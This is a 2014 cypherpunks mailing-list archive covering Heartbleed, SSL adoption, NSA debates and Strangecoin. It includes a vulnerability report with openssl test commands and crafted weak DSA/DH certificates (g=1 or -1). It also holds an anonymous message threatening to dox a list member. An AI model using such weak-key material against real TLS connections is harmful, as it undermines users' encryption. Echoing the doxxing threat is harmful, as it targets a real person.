<825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at> Message-ID: <005d01cf5258$56682820$03387860$@net> Don't you think that endlessly posting every time Cari does that that's trolling as well, it's tiresome, if you have something to say then say it but for gods sake drop the bloody pretend Indian thing, people either know and don't care or don't know and wouldn't care anyway, Christ for all anyone knows everyone else on here is a fantasist sat at their computer in stained white pants jacking off to my little pony and reading full-disclosure for erotica, so does it really matter? -----Original Message----- From: cypherpunks [mailto:cypherpunks-bounces at cpunks.org] On Behalf Of Anonymous Remailer (austria) Sent: Saturday, April 05, 2014 2:47 PM To: cypherpunks at cpunks.org Subject: FAKE Indian TROLL ALERT!!(cari machet warning!) On Apr 5, 2014, at 3:26 AM, Cari Machet wrote: > capitalist AND You BITCH are a thieving Looter Time to DOX you and turn over all to the passport authorities/NSA!! FUCK you Cari Machet - fake indian From hozer at hozed.org Mon Apr 7 12:32:24 2014 From: hozer at hozed.org (Troy Benjegerdes) Date: Mon, 7 Apr 2014 14:32:24 -0500 Subject: Strangecoin In-Reply-To: References: Message-ID: <20140407193224.GO3180@nl.grid.coop> On Sun, Mar 30, 2014 at 04:26:15PM -0500, Bryan Bishop wrote: > No proposed implementation but here's some fun ideas: > > http://digitalinterface.blogspot.com/2014/03/strangecoin-proposal-for-nonlinear.html > > """ > What's unique about Strangecoin? > > - Strangecoin transactions can be *nonzero sum*. A Strangecoin > transaction might result in *both* parties having more Strangecoin. > - Strangecoin transactions can be *one-sided* and can be conducted > entirely by only one party to the transaction. > - The rate of change of one's Strangecoin balance is a more important > indicator of economic influence than the balance itself. > - Optimal investment strategy in Strangecoin aims to *stabilize* one's > balance of Strangecoin. > - A universal account provides all users a basic Strangecoin income, > effectively unlimited wealth, and direct feedback on the overall prosperity > of the network. This is exceedingly and wonderfully strange. Let me suggest point 1 can be easily prototyped with a negative transaction fee using an existing coin (might I also suggest a copycatcoin) However, I think the phrase 'effectively unlimited wealth' is a dangerous phrase, as there are some things which are effectively unlimited, like the amount of solar energy that could be captured using existing rooftops. But what is limited is the *time and attention* of the people who know how to install and maintain said rooftop solar. I think it is wise to separate 'basic needs' from 'wealth wants' and that one can be quite happy and content with all basic needs met, but very little wealth. My view is unlimited wealth is somewhat of an inherent contradiction in terms. The very function of 'wealth' is to provide a sorting function > .... > > As the example suggests, the dynamics of Strangecoin might be usefully > thought of in terms of a "reputation system" rather than a strictly > financial tool, even though the basic mechanics involve the regular method > of exchanging currency for goods perceived by both parties to be of equal > value. Because of the nonlinear relationships among Strangecoin users, each > user effectively draws on a network of support in each economic > transaction, coupling its activity to the successes (and failures) of the > that network of activity. The result is a model of the complex > interdependencies within a community of economic agents, and the dynamics > by which those networks develop and decay. For this reason, Strangecoin > might have implications for quantifying the role of individual choices and > responsibility in the context of corporate action, and for resolving other > difficult issues in the management and ethics of collective economic action. > """ > > https://news.ycombinator.com/item?id=7494709 > > """ > Other comments suggest that this can be implemented with existing tools, > which I take as a virtue of the proposal. > > In any case, John von Neumann proved a long time ago that any nonzero sum > game with n players can be modeled as a zero sum game with n+1 players, > where the n+1 player represents the global state. TUA is simply an > implementation of this proof. > > http://en.wikipedia.org/wiki/Zero-sum_game#Extensions > > I tried to explain inhibition in another comment in this thread. > https://news.ycombinator.com/item?id=7496858 > > I give an an analogy in the proposal of the popularity of a celebrity > couple being a nonlinear relationship to the popularity of each celebrity > individually. I think our intuitive understanding of our social > relationships is nonlinear in this way generally, and I think Strangecoin > can model those nonlinear relationships well. > > So, for instance, I'm imagining a family, spouses, close friends, and so on > entering into extended coupling transactions, so that as a community their > prosperity rises and falls together. I might also enter into such > transactions with certain business with whom I want to couple my > activities, and these coupling transactions might serve in lieu of direct > billing or payment. A coupling relationship with a business is effectively > a contract, but with traditional currency you need the whole legal > framework of contracts to support the transaction, and with Strangecoin the > transaction is built directly into the currency, and the interface looks > almost exactly like a point-of-sale cash transaction. > > And I can enter into less serious relationships of varying degrees with > other parties. The effect is a way of managing not just financial > transactions, but also reputation, investment, and other dynamics social > constraints on the economy via the currency itself. Money is memory ( > http://www.minneapolisfed.org/research/sr/sr218.pdf), but our existing > currencies only represent some aspects of our economic activity, and > therefore put limits on the memory stored in the economy. A nonlinear coin > like Strangecoin can embed that social knowledge in the currency itself, > providing a more robust memory framework on which we can conduct our > economic transactions. > > I only hint at this in the proposal, but I suspect a system like this is > required to resolve the twisted legal artifice the corporate veil, because > it quantifies explicitly the role individuals have in collective economic > activity, and thereby gives a method for explicitly holding persons > proportionally responsible (in both credit and blame) for their > contributions to that activity. > > But I think that's a much more radical proposal than the one I've offered > for Strangecoin, and I should probably only be defending that here. =) > """ > > - Bryan > http://heybryan.org/ > 1 512 203 0507 -- ---------------------------------------------------------------------------- Troy Benjegerdes 'da hozer' hozer at hozed.org 7 elements earth::water::air::fire::mind::spirit::soul grid.coop Never pick a fight with someone who buys ink by the barrel, nor try buy a hacker who makes money by the megahash From juan.g71 at gmail.com Mon Apr 7 13:24:02 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Mon, 07 Apr 2014 17:24:02 -0300 Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group] In-Reply-To: References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> Message-ID: --On Sunday, April 06, 2014 8:30 PM -0700 coderman wrote: > On Sun, Apr 6, 2014 at 1:31 PM, Juan Garofalo wrote: >> ... >> Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE >> COLLECTION OF NSA EMPLOYEES. > > the evidence points otherwise. you can see the compartmentalization > at work in the leaks, in the way the technology is structured, in the > constraints that some systems exhibit while others do not. > > this is an interesting reverse engineering exercise, you should try it :) What I said is still true. Even if 'compartamentallized', the NSA is nothing but its employees. But fine, your point is that only 'some' people are doing 'bad' things there? That whoever cleans bathrooms at the NSA doesn't know what the top criminals are planning and doing? Mostly true, but I don't think too relevant. (even people who clean bathrooms at the NSA could be working somewhere else) > > > >> Ah, yes, this team of murderers is bad 'as a team', but when you >> look at each individual murderer, individually they are >> anarcho-libertarian-pacifists who live in a monastery in tibet. > > i like some of their old work protecting things, rather than breaking > them. Protect what from whom? > > (are you really equating writing automated fuzzers with targeted > murder by sniper fire? (drone snipers count)) > I'm saying that the members of the military are morally responsible for the crimes of the military. You might argue that some members are more responsible than others, but fact is, they all 'believe' in the same core murderous principles. From jya at pipeline.com Mon Apr 7 16:48:26 2014 From: jya at pipeline.com (John Young) Date: Mon, 07 Apr 2014 19:48:26 -0400 Subject: snowman news In-Reply-To: <001501cf52b8$3407a4d0$9c16ee70$@com> References: <001501cf52b8$3407a4d0$9c16ee70$@com> Message-ID: Great that Snowden is getting another chance to speak for himself, as available on an awfully restricted technical tube-like forum -- so far only talking head shots at the venues where he has been beamed in from who knows where, scripted by who knows who from his burgeoning team of handlers, now joined by EU polopportunists. It would be even greater if if Snowden himself released or at least displayed documents beside his head or encouraged the withholders to do so as the surcharge for their exclusive rigging of ever fewer releases. Head shotting and paneling by and about Snowden seems to have substituted for release of documents needed for us to reach our own conclusions. Entertainment over information. Oh well, that condescension is how media, politicians and governments manipulate us ignorant consumers of produce. Thanks for keeping us alert to EU produce. Regards, John At 07:22 PM 4/7/2014, you wrote: >http://www.dailytelegraph.com.au/news/breaking-news/snowden-to-address-europ >e-rights-watchdog/story-fni0xqlk-1226877345106 > >Snowden testifies: >Council of Europe Live video link: Tuesday, 12 noon GMT: >http://webtv.coe.int/index.php?CategoryID=56763&SubCategoryID=56776 >Link will be active 30 minutes before event. From eric at konklone.com Mon Apr 7 19:51:40 2014 From: eric at konklone.com (Eric Mill) Date: Mon, 7 Apr 2014 22:51:40 -0400 Subject: [cryptography] Github Pages now supports SSL In-Reply-To: References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca> <450704774.433340.1396812055146.JavaMail.www@wwinf8222> Message-ID: For what it's worth, I think CloudFlare dropping the price of SSL is going to force other companies to follow suit, so hopefully their move creates competition that both reduces CloudFlare dependency and increases the amount of encrypted traffic on the web. For example, today I learned that Amazon CloudFront finally dropped the price of SSL in front of S3 for custom domains from $600/month(!!) to $0/month: http://aws.amazon.com/cloudfront/custom-ssl-domains (As long as you're comfortable using SNI, which excludes users on Windows XP.) CloudFlare is hopefully just one part of the tip of the spear. On Mon, Apr 7, 2014 at 4:05 AM, ITechGeek wrote: > For the 3 co-founders, they appear to provide the exact same info as when > the Wayback Machine first captured the people page in 2010. > > > http://web.archive.org/web/20101015060142/http://www.cloudflare.com/people.html > > http://www.linkedin.com/in/mprince > http://www.linkedin.com/pub/michelle-zatlyn/9/b19/17b?trk=pub-pbmap > http://www.linkedin.com/pub/lee-holloway/0/152/159 > > I don't see any indication of connections to the US Intel Community based > on looking them up online. I see connections to Law Enforcement for > Matthew Prince, but connections to law enforcement != connections to Intel > community. > > I'm not debating the idea Cloudflare could receive an NSL which is true > for any US company (although I think most countries have some equiv). > > You are telling us to do our homework. Since we don't seem to be seeing > the same information that you are, can you point us at some sites? Maybe > the search engine you are using is pointing you in a different direction > than Google is pointing me or maybe you know better search terms. > > > > ----------------------------------------------------------------------------------------------- > -ITG (ITechGeek) > ITG at ITechGeek.Com > https://itg.nu/ > GPG Keys: https://itg.nu/contact/gpg-key > Preferred GPG Key: Fingerprint: AB46B7E363DA7E04ABFA57852AA9910A DCB1191A > Google Voice: +1-703-493-0128 / Twitter: ITechGeek / Facebook: > http://fb.me/Jbwa.Net > > > On Sun, Apr 6, 2014 at 5:28 PM, Ryan Carboni wrote: > >> oh dear. >> He helped the government combat crime and nuisance style offenses. >> Clearly in collusion. >> >> >> On Sun, Apr 6, 2014 at 12:20 PM, wrote: >> >>> > Message du 06/04/14 17:41 >>> > De : "staticsafe" >>> > On 4/6/2014 10:40, tpb-crypto at laposte.net wrote: >>> > >> Message du 04/04/14 20:09 >>> > >> De : "Eric Mill" >>> > >> Along with Cloudflare's 2014 plan to offer SSL termination for >>> free, and >>> > >> their stated plan to double SSL on the Internet by end of year, the >>> barrier >>> > >> to HTTPS everywhere is dropping rapidly. >>> > >> >>> > > >>> > > I agree that putting https everywhere is great, but Cloudflare's >>> founders are tightly linked with the US-intelligence community. That fact >>> alone kind of kills any claims they make about data security within their >>> service. >>> > >>> > Source for this please? >>> > >>> >>> Is it so painful to do your own homework? >>> >>> "Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in >>> 2009.[1][2] They previously worked on Project Honey Pot." - >>> http://en.wikipedia.org/wiki/CloudFlare >>> >>> "[...] the project organizers also help various law enforcement agencies >>> combat private and commercial unsolicited bulk mailing offenses and overall >>> work to help reduce the amount of spam being sent [...]" - >>> http://en.wikipedia.org/wiki/Project_Honey_Pot >>> >>> That's just for starters, you can dig more and find more. It is >>> interesting that the history of the founders themselves is no longer >>> exhibited in cloudflare.com website as it was years ago. >>> >>> >>> As an American company, there is nothing preventing Cloudflare from >>> receiving NSLs and having to shut up about them. What use is a system that >>> you can't trust like this? >>> >>> You can say "oh, but they go after the bad guys, spammers". But that >>> doesn't limit it to spammers neither do we know who are the so called bad >>> guys, since that is decided by American secret laws, made by secret courts, >>> that issue secret orders. >>> >>> No trust to American companies, less even trust to American companies >>> that promise any kind of data security. Better no security than a false >>> sense of it. >>> >>> Sorry. >>> _______________________________________________ >>> cryptography mailing list >>> cryptography at randombit.net >>> http://lists.randombit.net/mailman/listinfo/cryptography >>> >> >> >> _______________________________________________ >> cryptography mailing list >> cryptography at randombit.net >> http://lists.randombit.net/mailman/listinfo/cryptography >> >> > > _______________________________________________ > cryptography mailing list > cryptography at randombit.net > http://lists.randombit.net/mailman/listinfo/cryptography > > -- konklone.com | @konklone -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7804 bytes Desc: not available URL: From grarpamp at gmail.com Tue Apr 8 00:22:17 2014 From: grarpamp at gmail.com (grarpamp) Date: Tue, 8 Apr 2014 03:22:17 -0400 Subject: Meanwhile as the internet reboots... Message-ID: Depending on your looking glass, at around 20:30UTC one particular system (the Tor network, ~5300 nodes) had a cumulative uptime of about 14.05Gsec. It's dropped by about 6.5% so far. This bug should make for some interesting infrastructure analysis across a variety of systems. http://heartbleed.com/ From guninski at guninski.com Tue Apr 8 02:23:24 2014 From: guninski at guninski.com (Georgi Guninski) Date: Tue, 8 Apr 2014 12:23:24 +0300 Subject: Should openssl accept weak DSA/DH keys with g = +/- 1 ? Message-ID: <20140408092323.GA11169@sivokote.iziade.m$> I am a noob at crypto. IIRC similar attack was used against Tor several years ago. In DSA it is possible to force g=1 or g \equiv -1 \mod p. The first is unit and the second is of multiplicative order 2. This are clearly weak and insane choices, but this might have implications to MITM (might be wrong on this). For DH could generate key with g=1, though couldn't test it. Tested both 1 and -1 cases in DSA, the probability of successful connection was about 1/4 (or maybe 1/2), errors in the other cases. (for $1$ I would expect probability $1$). Attached are cacert.pem and cacert2.pem, the magic word is 1234. To test: $ openssl s_server -accept 8888 -www -cert cacert.pem $ openssl s_client -connect localhost:8888 -showcerts To examine $openssl x509 -text -in cacert2.pem $openssl dhparam -text -in dHParam.pem (not sure if dHParam.pem this is usable, forged generation). Firefox refuses connections, Konqueror works with same probability. Suspect this might be related to EC refusing the point at infinity. Might have MITM implications, don't have working exploit (If a MITM can forge $g=1$ in DH, the private keys are useless). -------------- next part -------------- -----BEGIN DSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,DB7F9CD65ADD77AB Xn9Qv7Lai2TC5lL6+gjO6c8TZc/afHcQRkzMOu5Jgonz9yVxMA02x6eVIRmKyosK KeeaaPCBqquWOaP3cgf2Qjq7pdYiexd1yAv+aLT/+d6BY5Mou+Mqif8/lWsTyoEC Hn1c+I7WCVyBw2Gw5RhgLmA321Ry1lQbjcrm7q9S9O59xG9QbaicZ/lY2nQz75oL oMzRhzFvbsOYs86f1Q2cK2y09+RvVY/HxBEugs98ITKoNVdrXbpPVBhnWOqfVcgc GizvsLLM92dAe0Ar5vgIP7Dtv8oz/jXo0U4fbBw5/hHHwhC5tLZdYbXPixff+4qx yQOuED5GBVZY1bKCAUPAinGcQ8KPadUQyNx7Mv5rRoWEZHF/bC9kFodqFe1j3d0+ t0RWgrCY9xSHAOq22lhPI5MEOXAcjaUeJh/ykga4NiZ28keL8MzNXHT5HdtvR+GB zhkAv7gAF5erzlJbt1FzsQQJFRMu1NKC53Dy9/uzpe+ADtptti9LhLU0SXQ5AWIW zoIXa8FtNw71Nv45onBZmCwmy1fSp3Dm4mhYeC6BHIw8AeqLfpm4vHmPTutEVL05 ODDc2xk0v8b8F1sn0h1rE9xo4S/mAfbv -----END DSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDXDCCAy+gAwIBAgIJAJ4Q4SMgSc5DMAkGByqGSM44BAMwRTELMAkGA1UEBhMC QVUxEzARBgNVBAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0IFdpZGdp dHMgUHR5IEx0ZDAeFw0xNDA0MDgwNjA2MThaFw0xNDA1MDgwNjA2MThaMEUxCzAJ BgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5l dCBXaWRnaXRzIFB0eSBMdGQwggG4MIIBLAYHKoZIzjgEATCCAR8CgYEAzW4QxCTN cMtydrq+ef9XUrAz+A7LsU0u0MFXKIzo5RxNap5PuiG3aOmAu4nV8abi6SAEx9sQ q5Q+tuHxXt+eNGdozbZJzVzOe+VKq9untmufUEE6B0R92aXm6ZSWqLo0s6xQN0jv At0BnR7+OVHupSW51SLHFjjl+I8u/MQPa+kCFQDYafvWAxlN4zQCarbUaXWMmdeH bwKBgQDNbhDEJM1wy3J2ur55/1dSsDP4DsuxTS7QwVcojOjlHE1qnk+6Ibdo6YC7 idXxpuLpIATH2xCrlD624fFe3540Z2jNtknNXM575Uqr26e2a59QQToHRH3Zpebp lJaoujSzrFA3SO8C3QGdHv45Ue6lJbnVIscWOOX4jy78xA9r6AOBhQACgYEAzW4Q xCTNcMtydrq+ef9XUrAz+A7LsU0u0MFXKIzo5RxNap5PuiG3aOmAu4nV8abi6SAE x9sQq5Q+tuHxXt+eNGdozbZJzVzOe+VKq9untmufUEE6B0R92aXm6ZSWqLo0s6xQ N0jvAt0BnR7+OVHupSW51SLHFjjl+I8u/MQPa+ijgacwgaQwHQYDVR0OBBYEFGo6 avmmK25QUfw2FSU684prw3kIMHUGA1UdIwRuMGyAFGo6avmmK25QUfw2FSU684pr w3kIoUmkRzBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8G A1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkggkAnhDhIyBJzkMwDAYDVR0T BAUwAwEB/zAJBgcqhkjOOAQDAxwAMBkCAQACFEHWsp2rVgBO4mK5C+J1rnCMhD4t -----END CERTIFICATE----- -------------- next part -------------- -----BEGIN ENCRYPTED PRIVATE KEY----- MIIBljBABgkqhkiG9w0BBQ0wMzAbBgkqhkiG9w0BBQwwDgQIUbBedH6EQe8CAggA MBQGCCqGSIb3DQMHBAjo+UVA5oKM3wSCAVCK5idMcNAuMjE8rzpM0BP1LYUdgDHF NJeUSS849HCNr/HCNME7L9+ieruuESKFsAoNCI7f49XrtoUKn6xjykVwy8fEIgvY h2pM/zuMEVOgU1CC5iaxopW2RFVwJa/qZRGuZQl62UwwKYezshu2Aq1yhDcA5F51 gXhYayS3G/oTXtzMx7+C87VZnltWIFbaE9sh3KCBRHfWD02zTnBoUHjUt7QvuMeR NlVnAI/anhzB9dW+++QDX2oLJ4Ch45jRZy0Eg9taT+jAclda7R8madXd+7esai3x cbgxSSZHDi662XKxT1Cj8CZpdMp/GaAjJjeXnvzdIzSgqJzosME3G9/tEAs8qyiU 6pzpejFOxwNkkp7aPNMb9OBtaOShFPaHdeDhwqff4AdMNkI47L6s0tNhfW9Is+pO vIcEtBckJJRBV5fOH4IRjauvG3TqXoNZwOY= -----END ENCRYPTED PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIICgjCCAlWgAwIBAgIJAPNFA67yoKQ1MAkGByqGSM44BAMwRTELMAkGA1UEBhMC QVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdpZGdp dHMgUHR5IEx0ZDAeFw0xNDA0MDgwNzQ2MDBaFw0xNDA1MDgwNzQ2MDBaMEUxCzAJ BgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5l dCBXaWRnaXRzIFB0eSBMdGQwggE2MIIBLAYHKoZIzjgEATCCAR8CgYEAj6FTWA+z FLie9ojr3+hs7PhWHX6cZ8iJxfDJoNf6BRIjAeFO5GqNy329c8IWR1TjEFGesbxb DuVawrnpaPI+H6vPt3QYtRJKgEmhAddNaruQ4DvGXI3ROwRQQDnIjZ5G53XnROqq xJ01AbHZm3fIqfUhlObieabuVM9v7JrzViMCFQDJa1wUK89qXPyMPNhBlkTD/iiw bQKBgQCPoVNYD7MUuJ72iOvf6Gzs+FYdfpxnyInF8Mmg1/oFEiMB4U7kao3Lfb1z whZHVOMQUZ6xvFsO5VrCuelo8j4fq8+3dBi1EkqASaEB101qu5DgO8ZcjdE7BFBA OciNnkbndedE6qrEnTUBsdmbd8ip9SGU5uJ5pu5Uz2/smvNWIgMEAAIBAaNQME4w HQYDVR0OBBYEFKJObNzcZ8MX+c5Wegvz1wQAZq9IMB8GA1UdIwQYMBaAFKJObNzc Z8MX+c5Wegvz1wQAZq9IMAwGA1UdEwQFMAMBAf8wCQYHKoZIzjgEAwMcADAZAgEB AhRR7IPxVOY1ELLGCsGGcQL6e2Bv+A== -----END CERTIFICATE----- -------------- next part -------------- -----BEGIN DH PARAMETERS----- MIGHAoGBAOnh7CKkyZlo8RdK7m4IL085MUpVxBeKrArx7kJZp8/3ctjEli2m5U32 GuwUBYmi5t65ChuOOc+nTQiTYwsoviPJnhM0uxPz3Hu5wtlJtBQQNoOwKvK7RwHS JOs/JhVBjL+VErMe90QbW77wmtZWx9KzDY/O9kYGtzT/37AGP32TAgEB -----END DH PARAMETERS----- From guninski at guninski.com Tue Apr 8 03:49:35 2014 From: guninski at guninski.com (Georgi Guninski) Date: Tue, 8 Apr 2014 13:49:35 +0300 Subject: Should openssl accept weak DSA/DH keys with g = +/- 1 ? In-Reply-To: <20140408092323.GA11169@sivokote.iziade.m$> References: <20140408092323.GA11169@sivokote.iziade.m$> Message-ID: <20140408104935.GC11169@sivokote.iziade.m$> On Tue, Apr 08, 2014 at 12:23:24PM +0300, Georgi Guninski wrote: > other cases. (for $1$ I would expect probability > $1$). This was mistake, both certs had g= -1. With g=1 probability is $1$ in openssl and Konqueror. cacert3.pem is with g=1. > -------------- next part -------------- -----BEGIN ENCRYPTED PRIVATE KEY----- MIIBFTBABgkqhkiG9w0BBQ0wMzAbBgkqhkiG9w0BBQwwDgQIxH80wKjVLOUCAggA MBQGCCqGSIb3DQMHBAiKk5RW6pYvxASB0NX7ub1i7IB0iKhi9mzkldCOAXtPULHo wbwFR4yu4lMOj57xhmgA/TSgIxLFj6b9bLC2y0SKXCOf8VNxkL6CxWkuGSni/y+w zJLksztdX1z60lXJxRkyNHFZWHW6lL3SKIwwpNMp1/YpExhG8ZPr83ZPEP+lNsFH gCAYyJteFZfVC19CLDDt/ET4wf8iEXypiPgDN6TvPAh9EulFYyk2vWVpSwH956il PUczkkU7G9eho04dqjIZQVTT+Z+Lnq2Ed8DDGzDa3ytdouHaJYcn5f8= -----END ENCRYPTED PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIB/jCCAdGgAwIBAgIJAM5rZLy9VJdmMAkGByqGSM44BAMwRTELMAkGA1UEBhMC QVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdpZGdp dHMgUHR5IEx0ZDAeFw0xNDA0MDgxMDQzMjJaFw0xNDA1MDgxMDQzMjJaMEUxCzAJ BgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5l dCBXaWRnaXRzIFB0eSBMdGQwgbMwgaoGByqGSM44BAEwgZ4CgYEA/jX7Klgx5HVc WlqoH8oyo9aO/XqHhOoYVs8TlD+lCSjQ5PMKmdYkyQYxF4i0pFe8A7F0quUFY+LW ORJEQqvBydRXqWjxRSCiEvW2yAT3u4c0KvKR3Yxt1LX7htsaaFb3BmDNkrhQgxwj 58KpTq5f7z0QHUysyQFMrvK4pwEOPpcCFQDvxW5qbbPAK8nfLCi7Vh/z1LNCCwIB AQMEAAIBAaNQME4wHQYDVR0OBBYEFKJObNzcZ8MX+c5Wegvz1wQAZq9IMB8GA1Ud IwQYMBaAFKJObNzcZ8MX+c5Wegvz1wQAZq9IMAwGA1UdEwQFMAMBAf8wCQYHKoZI zjgEAwMcADAZAgEBAhQeAWNnvnZugjHVZmu+A04576ykmQ== -----END CERTIFICATE----- From eric at konklone.com Tue Apr 8 11:04:58 2014 From: eric at konklone.com (Eric Mill) Date: Tue, 8 Apr 2014 14:04:58 -0400 Subject: [Cryptography] [cryptography] Github Pages now supports SSL In-Reply-To: <20140408025433.9A00B11E4D@a-pb-sasl-quonix.pobox.com> References: <20140408025433.9A00B11E4D@a-pb-sasl-quonix.pobox.com> Message-ID: Yeah, it's real terrific. -_____- @ITechGeek, my understanding was that SNI was handled at an OS level by WinXP, and no browser would work on it. I could be wrong, I haven't researched it myself. On Mon, Apr 7, 2014 at 10:31 PM, Bill Stewart wrote: > At 11:08 AM 4/4/2014, Eric Mill wrote: > >> I know most of the people on here have transcended the earthbound, >> maudlin Certificate Authority system, but as services-adopting-SSL-news >> goes, I'm particular excited about > 444555263195217920>Github Pages, which started quietly supporting SSL >> for *.github.io domains a few weeks back. >> > > Well that was convenient timing, considering the OpenSSL "Change All Your > Certs and Keys Now" bug announcement that just hit the wires :-) > > _______________________________________________ > The cryptography mailing list > cryptography at metzdowd.com > http://www.metzdowd.com/mailman/listinfo/cryptography > -- konklone.com | @konklone -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2038 bytes Desc: not available URL: From dal at riseup.net Tue Apr 8 12:54:04 2014 From: dal at riseup.net (Douglas Lucas) Date: Tue, 08 Apr 2014 14:54:04 -0500 Subject: How we get there Re: Geoff Stone, Obama's Review Group In-Reply-To: <533F151F.6020801@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> <533F151F.6020801@cpunk.us> Message-ID: <534453DC.6060608@riseup.net> The book Binding Chaos by Heather Marsh, who ran WikiLeaks Central from 2010 to 2012, describes a system for governance using the Internet as a mass collaboration tool. Free, full text PDFs available from the landing page: http://georgiebc.wordpress.com/2013/05/24/binding-chaos/ The book describes using stigmergy for work, rather than time-wasting consensus or coercive hierarchy, approval economy instead of a financial system, control by user groups rather than democracy, and more. Douglas On 04/04/2014 03:25 PM, Cypher wrote: > On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: >> Cypher wrote, On 04/03/2014 05:22 PM: > >>> But, please, instead of ranting and wild arm-waving, educate me >>> if I am wrong. I would certainly /love/ to see a workable, large >>> scale, anarchistic plan. > >> Please, no large scale plans, I beg you. I simply wish to see the >> emergent effects of countless individuals interacting with each >> other solely on the basis of mutual consent. That is all. > > Good response, Patrick. But how do you think we're going to get to > that? Without concerted action, and it has to be more than everybody > doing their own thing IMHO, how will that goal be achieved? I hear a > lot of anarchists saying what you say and it's a fantastic goal. But > how do we get there? > > From grarpamp at gmail.com Tue Apr 8 14:25:38 2014 From: grarpamp at gmail.com (grarpamp) Date: Tue, 8 Apr 2014 17:25:38 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <53443999.2090906@gmx.com> References: <53443999.2090906@gmx.com> Message-ID: On Tue, Apr 8, 2014 at 2:02 PM, Joe Btfsplk wrote: >> On 4/7/2014 6:14 PM, grarpamp wrote: >> http://heartbleed.com/ >> Patch your stuff. > Comments / suggestions from those w/ in depth knowledge in this area? How > users should proceed; how to check if sites used (banks, email, retail > sites, etc.) were / still are affected, so one knows if & when to change > passwords or other data? > > If the number of sites potentially affected is as large as indicated on > heartbleed.com, changing PW on even 60% of sites I use could take a long > time - even to do it once. > > It would do little good to change a password on a site that hasn't patched > this. > Or perhaps it would do some good, to change the password before logging out > of a site? Then when a site must be accessed again, change the password > again. > > Either way, this might not provide perfect safety, but might ? be better > than nothing. https://blog.torproject.org/ covers what to do for Tor things. For everything else on the net, fix the clients and servers you're responsible for. Then... You're right, there's a big gotcha in all this, users won't really know if the services they interact with have been fixed [1] because huge swaths of services simply don't publish what they do on their pages, they bury it to keep quiet and shiny happy sites. Only some banks, insurers, utilities, schools, etc will post "we're fixed" anywhere remotely prominent. So you have to trust they did [2], which is a reasonable assumption given regulation and liability of big institutional services. You should already have a regular password changing/logout/session management regimen, so inserting some extra instances of that along guesstimates of [2] should suffice with these classes of service. [2] Sometime during the falloff curve starting yesterday afternoon. The real user risk is likely on mid to small services, embedded things, shared platforms, legacy systems, services that didn't get the news, don't have the resources or knowledge to fix, etc. Again, consider some form of reasonable regimen. And there are all sorts of tools and site testing services coming out now for which a brave user might be completely warranted in using to determine [1 above] so they know when to utilize [regimen 2]. (Far better to use a testing service or email their help desks seeking a positive statement than risk being potentially considered an exploiter of things you don't own.) Partial list... http://s3.jspenguin.org/ssltest.py https://gist.github.com/takeshixx/10107280 https://github.com/FiloSottile/Heartbleed https://www.ssllabs.com/ssltest/index.html (Note, this is a TLS in process bug, so more than HTTP/S services are affected...) This bug will no doubt trigger some thinking, analysis and change in the services, security, infrastructure and user communites... that's a good thing. From carimachet at gmail.com Tue Apr 8 16:13:38 2014 From: carimachet at gmail.com (Cari Machet) Date: Tue, 8 Apr 2014 23:13:38 +0000 Subject: How we get there Re: Geoff Stone, Obama's Review Group In-Reply-To: <534453DC.6060608@riseup.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> <533F151F.6020801@cpunk.us> <534453DC.6060608@riseup.net> Message-ID: i do need to read it but at face value - or what u pulled out - consensus is not a problem regarding time wasting - as the ideas of efficiency are capitalistic and massively overblown + often what seems efficient is just short term problem solving - leaving huge gaps for people to have to deal with later - the big problem with consensus is mob rule - just like the problem we have with supposed democracy in the representative manner prolific now On Tue, Apr 8, 2014 at 7:54 PM, Douglas Lucas wrote: > The book Binding Chaos by Heather Marsh, who ran WikiLeaks Central from > 2010 to 2012, describes a system for governance using the Internet as a > mass collaboration tool. Free, full text PDFs available from the landing > page: http://georgiebc.wordpress.com/2013/05/24/binding-chaos/ > > The book describes using stigmergy for work, rather than time-wasting > consensus or coercive hierarchy, approval economy instead of a financial > system, control by user groups rather than democracy, and more. > > Douglas > > On 04/04/2014 03:25 PM, Cypher wrote: > > On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: > >> Cypher wrote, On 04/03/2014 05:22 PM: > > > >>> But, please, instead of ranting and wild arm-waving, educate me > >>> if I am wrong. I would certainly /love/ to see a workable, large > >>> scale, anarchistic plan. > > > >> Please, no large scale plans, I beg you. I simply wish to see the > >> emergent effects of countless individuals interacting with each > >> other solely on the basis of mutual consent. That is all. > > > > Good response, Patrick. But how do you think we're going to get to > > that? Without concerted action, and it has to be more than everybody > > doing their own thing IMHO, how will that goal 